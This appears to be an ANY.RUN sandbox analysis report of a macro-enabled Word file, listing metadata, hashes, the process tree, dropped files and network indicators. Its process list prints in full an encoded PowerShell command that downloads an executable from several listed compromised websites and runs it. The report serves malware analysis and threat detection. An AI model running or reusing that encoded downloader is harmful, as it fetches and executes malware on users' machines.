analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

DATA_FILE-Z9926-O33129.doc

Full analysis: https://app.any.run/tasks/b4e3b7a3-ea55-44ae-a655-9fc375bd2405
Verdict: Malicious activity
Analysis date: May 24, 2019, 18:10:34
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Unbranded Rubber Chair generating Benin, Subject: bypassing, Author: Blanca Tromp, Comments: Generic Metal Bike Sleek Rustic, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri May 24 14:52:00 2019, Last Saved Time/Date: Fri May 24 14:52:00 2019, Number of Pages: 1, Number of Words: 15, Number of Characters: 91, Security: 0
MD5:

CC072A0AEDB7D4B280E5FF668ECD2400

SHA1:

66CB22E3DAAF39FCD1BDAF5282E6D4CDA9F82EA3

SHA256:

5F8A6D265D1279C7D573F006342599B55E9675654506357BDE94E12261B02D37

SSDEEP:

1536:PDMeOY5C6OJsdBpZW3+a9aCM0YvL3ozpycr25Tj+LYR:P4eOY5CTsdAsCMYv0TjxR

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3868)
    • PowerShell script executed

      • powershell.exe (PID: 3868)
    • Executed via WMI

      • powershell.exe (PID: 3868)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 908)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 908)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Title: Unbranded Rubber Chair generating Benin
Subject: bypassing
Author: Blanca Tromp
Keywords: -
Comments: Generic Metal Bike Sleek Rustic
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:05:24 13:52:00
ModifyDate: 2019:05:24 13:52:00
Pages: 1
Words: 15
Characters: 91
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Murazik, Von and Gislason
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 105
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Hansen
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
908"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\DATA_FILE-Z9926-O33129.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3868powershell -nop -e JABJADYAWQBLAHUAdgA9ACcAVwBaAEcAegB3AFUAVgBwACcAOwAkAGwAUwBvAHcAcQBVAG4AIAA9ACAAJwA1ADIAMgAnADsAJABGAHAATwA1AFkAZgBZAD0AJwBwAGkAaQBoAEMAOQAnADsAJABOAGgANwBZAHIAOAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAbABTAG8AdwBxAFUAbgArACcALgBlAHgAZQAnADsAJABXADUAagB3ADgAaQA9ACcAegByADgAMABUAEkASwAnADsAJABTAGoAaQBrAG4ARQA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQAYAAuAGAAdwBFAEIAYwBsAGkAZQBuAHQAOwAkAHYAMQBiADAARwAyAD0AJwBoAHQAdABwAHMAOgAvAC8AZwB1AGEAbgBsAGEAbgBjAG0ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADkAMAAwAGUAeQAwADEAOQA3ADMAOAAvAEAAaAB0AHQAcAA6AC8ALwBwAG8AdwBlAHIAYgBvAHgAdAByAGEAeQBzAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwA4ADYAMgA4ADQALwBAAGgAdAB0AHAAOgAvAC8AcwBlAHYAYQBzAGgAcgBhAG0AbQBpAHQAaABhAGwAaQAuAGMAbwBtAC8AdAB1AGsAdwByAC8AaABqADcALwBAAGgAdAB0AHAAOgAvAC8AYQBwAHIAaQBnAGgAdABzAC4AYwBvAG0ALwBhAGIAbwB1AHQALwByAG0AdAB6AHUAMwAxADgALwBAAGgAdAB0AHAAOgAvAC8AYgAtAHMAdAB5AGwAZQBzAC4AbgBlAHQALwBpAG0AZwAvAHEAagBkAGwAeABvADEANQA3ADEAMQAvACcALgBTAFAAbABJAFQAKAAnAEAAJwApADsAJABsAHAANwBCAF8AcQA9ACcAdwBHADMAMwBqAHYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAE0ANABLADMAUgBCAE8AIABpAG4AIAAkAHYAMQBiADAARwAyACkAewB0AHIAeQB7ACQAUwBqAGkAawBuAEUALgBkAE8AVwBOAEwAbwBBAGQARgBJAEwAZQAoACQATQA0AEsAMwBSAEIATwAsACAAJABOAGgANwBZAHIAOAApADsAJABCAFAAbgAyAHcASgBLAD0AJwBXAHcAYwBrAHMAcABZACcAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQBtACcAKQAgACQATgBoADcAWQByADgAKQAuAGwARQBOAGcAdABIACAALQBnAGUAIAAzADIAMAAyADIAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABBAHIAVAAoACQATgBoADcAWQByADgAKQA7ACQAUAA3AFMAYgBPAEsAPQAnAFUAWQBxAFkAOABJAGYAUgAnADsAYgByAGUAYQBrADsAJABGAFQAagBmADkAcABqAD0AJwBqAFEAYgBpAFEASABiAGoAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAcABaAHEATgBMAHoAawBxAD0AJwBRAEUAYQB2ADMAZgBKAHYAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 320
Read events
1 130
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
11

Dropped files

PID
Process
Filename
Type
908WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR3FDB.tmp.cvr
MD5:
SHA256:
3868powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GEUZ9TX7N6LPUQ1I9OLV.temp
MD5:
SHA256:
908WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\13F3C71D.wmfwmf
MD5:95131B87E626B84D8FB67DD9C38EFE18
SHA256:2FAD33F4E891F23C3D4BD2E765DCEB77BCE184BC22ED697530ABFFE09062AD90
908WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:AE0B60D392C5FDA4624CC9AD3F4AAEE0
SHA256:A49C43919B9C42868D273705490A83F266671D808673FC29241C3212F43D300A
908WINWORD.EXEC:\Users\admin\Downloads\~$TA_FILE-Z9926-O33129.docpgc
MD5:E89625E73C0514935563E376900849D6
SHA256:BD94D48B22EC553291C0296B709BF282480C8BAB1975360FC4C4CDDE222628EF
908WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2789D88C.wmfwmf
MD5:B6D2DB29D16C8B8743D89485A2CA8392
SHA256:8B9B3F26ACF6EF58224A2F81AA9A3476BBB8CD6CFF25B2DF4AA0EB4667F70C21
908WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:FA803AEA98BE0DFBA285EAFEDD9AD8D3
SHA256:B8AF8155D7BAED98D45BFC7A7C72E91AFDADB84AC8BE053DDEEF0F365EDCB2BA
3868powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF134a6a.TMPbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
908WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\33236AF7.wmfwmf
MD5:87277F266428CAA5FF48E49C463EDB79
SHA256:64BB4BE43721FE5F08DC0451E8D89A19C5EA8E93C78E06AC6A5D6144FDB3F7E3
908WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\DATA_FILE-Z9926-O33129.doc.LNKlnk
MD5:3A14EC9BE73C5CAC715E86EA5D0FD6F8
SHA256:4472A058C715B3B8AFB8D52C3B6F2142D9B17BE538EC1C62B638DFB807F1F0B0
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3868
powershell.exe
GET
404
94.130.52.106:80
http://powerboxtrays.com/wp-includes/86284/
DE
xml
345 b
suspicious
3868
powershell.exe
GET
404
59.106.19.44:80
http://aprights.com/about/rmtzu318/
JP
xml
345 b
suspicious
3868
powershell.exe
GET
404
202.181.97.13:80
http://b-styles.net/img/qjdlxo15711/
JP
xml
345 b
suspicious
3868
powershell.exe
GET
404
166.62.28.118:80
http://sevashrammithali.com/tukwr/hj7/
US
xml
345 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3868
powershell.exe
59.106.19.44:80
aprights.com
SAKURA Internet Inc.
JP
suspicious
3868
powershell.exe
166.62.28.118:80
sevashrammithali.com
GoDaddy.com, LLC
US
malicious
3868
powershell.exe
94.130.52.106:80
powerboxtrays.com
Hetzner Online GmbH
DE
suspicious
3868
powershell.exe
119.3.105.255:443
guanlancm.com
CN
unknown
3868
powershell.exe
202.181.97.13:80
b-styles.net
SAKURA Internet Inc.
JP
suspicious

DNS requests

Domain
IP
Reputation
guanlancm.com
  • 119.3.105.255
unknown
powerboxtrays.com
  • 94.130.52.106
suspicious
sevashrammithali.com
  • 166.62.28.118
malicious
aprights.com
  • 59.106.19.44
suspicious
b-styles.net
  • 202.181.97.13
unknown

Threats

No threats detected
No debug info